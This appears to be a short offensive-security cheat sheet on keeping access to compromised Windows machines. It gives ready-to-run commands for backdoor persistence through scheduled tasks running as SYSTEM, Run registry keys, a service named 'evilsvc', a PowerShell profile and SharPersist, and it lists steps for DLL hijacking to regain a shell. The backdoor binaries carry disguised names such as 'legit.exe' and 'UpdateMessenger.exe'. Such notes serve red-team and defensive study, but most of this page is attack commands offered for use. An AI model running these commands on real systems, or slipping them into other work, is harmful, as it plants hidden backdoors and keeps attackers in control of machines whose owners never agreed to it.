Here are some common methods for maintaining access. If you find any errors or need to update anything, please mail me!

Schedule Task

We can create schedule to execute our specified binary or command. For example if we want to execute UpdateMessenger.exe every two hour. We can use below methods.

Native Windows Command

Upload your backdoor and run following command:

schtasks /create /sc hourly /mo 2 /tn "UpdateMessenger" /tr C:\Windows\Tasks\UpdateMessenger.exe /ru "SYSTEM"

Using SharPersist

.\SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

Download SharPersist.

Registry Persistence

By Modifying Registry key, attacker can start specified binary at startup.

Native Windows Command

For current compromised user

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Legit Service" /t REG_SZ /F /D "C:\Windows\Tasks\legit.exe"

If you have system access

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Legit Service" /t REG_SZ /F /D "C:\Windows\Tasks\legit.exe"

Using SharPersist

.\SharPersist.exe -t reg -c "C:\Windows\Tasks\legit.exe" -a "/c calc.exe" -k "Legit Service" -v "Test Stuff" -m add

As a result, whenever compromised system reboot, attack get reconnected.

Backdoor as a Service

If we create service we can execute our backdoor as a service

Native Windows command

sc create evilsvc binpath= "C:\Windows\Tasks\legit.exe" start= "auto" obj= "LocalSystem"

Using SharPersist

.\SharPersist.exeSharPersist -t service -c "C:\Windows\Tasks\legit.exe" -n "Legit Service" -m add

Powershell Profile

Whenever compromised user execute powershell , our backdoor also get executed!

  1. Create a file called profile.ps1 in %HOMEPATH%"\Documents"\windowspowershell
  2. Store your command to be executed!
echo "c:\Windows\Tasks\legit.exe" > %HOMEPATH%"\Documents"\windowspowershell\profile.ps1

DLL Hijacking

When a new process started, it searches for required libraries from some locations.

DLL Search Order:

1. The Application Directory
2. C:\Windows\System32
3. C:\Windows\System
4. C:\windows
5. Current Working Directory
6. Directories in %PATH% environment variable

How to Hijack?

  1. To hijack dll, we need to find which dll is not found but searched. We can use ProcMon and filter the Application name and Not Found Keyword.
  2. Then using icacls c:\TargetApp, we can verify if the directory is writable.
  3. If the directory is writable, we can make our malicious dll but name it same as the legit dll that is not found. Then copy to that directory.
  4. If everything done correctly, we will get shell if the vulnerable application re-executed!

Note: WinPEAS has capability to search, if DLL Hijacking is possible!

Other interesting methods is being noted to be added here!